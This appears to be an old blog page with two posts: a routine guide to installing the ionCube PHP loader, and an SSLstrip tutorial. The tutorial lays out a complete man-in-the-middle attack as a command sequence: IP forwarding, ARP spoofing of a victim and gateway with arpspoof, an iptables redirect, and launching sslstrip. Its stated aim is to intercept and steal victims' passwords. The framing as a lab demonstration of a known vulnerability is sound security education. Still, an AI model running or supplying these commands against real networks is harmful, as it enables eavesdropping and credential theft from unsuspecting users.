Monday, January 17, 2011

Installation Guide : ionCube loader

A guide to installing and configuring the ionCube loader to view encoded web pages for scripts such as ClientExec.What is ionCube ?
ionCube produces leading tools for PHP source code protection to secure your PHP software from prying eyes and to combat software piracy. Featuring an advanced compiled-code encoding engine that translates source to highly efficient bytecodes, ionCube encoding tools deliver the ideal combination of maximum source code protection without sacrificing performance, reliability or language compatibility.

In order to view encoded ionCube files on your server you need the ionCube loader. This is a free plugin for Apache web server that only takes a few minutes to install and is well worth it.
http://www.ioncube.com/
Requirements: - Root Shell access to your server
- phpinfo page: create a new document and call it phpinfo.php. Inside place <? phpinfo(); ?>
  Place this document in your www directory so you can view it and see all your PHP settings.
Installing ionCube Loader:
1. Download the program and store it on your server using wget or FTP.
http://www.ioncube.com/loader_download.php
2. Unpack the program
tar -zxvf ioncube_loaders.tar.gz
3. cd ioncube
4. copy ioncube-install-assistant.php to a web directory such as your hosting directory and open it in your browser window.
cp ioncube-install-assistant.php /home/userdirectoryhere/www
Then open it http://www.yourdomain.com/ioncube-install-assistant.php
The output should be something similar to:
Analysis of your system configuration shows:
PHP Version 4.3.3
Operating System Linux
Threaded PHP No
php.ini file /usr/local/lib/php.ini
Required Loader ioncube_loader_lin_4.3.so
5. Now lets move the iconcube directory to a permanent location:
cd ..
mv ioncube /usr/local

6. Now that you know the location of php.ini you need to edit it.
pico /usr/local/lib/php.ini
Now find where other zend extentions are in the file.
ctrl + w: zend_extension
Paste in your new line for ioncube loader
zend_extension = /usr/local/ioncube/ioncube_loader_lin_4.3.so
7. Save the changes
ctrl + X then Y and enter
8. Restart the web server to take effect.
/etc/init.d/httpd restart
Success! You should now see a section in your PHP Info page that says:
Additional Modules
Module Name ionCube Loader


Sunday, January 16, 2011

SSLstrip Tutorial


SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009. In this video we will look at how to get started with SSLstrip. We setup 2 vmware machines, one running Widnows XP (victim) and the other Backtrack 3 (Attacker). Before we actually begin hacking using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. We do this by using the following commands in sequence:

1. Setting up IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim and Gateway:

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

3. Setting up port redirection using Iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)

python sslstrip.py -w secret

Once this setup is up and running perfectly, all of our victim's traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim's passwords sent supposedly over "SSL".
Download SSLstrip Tool : Here - SSLstrip Tool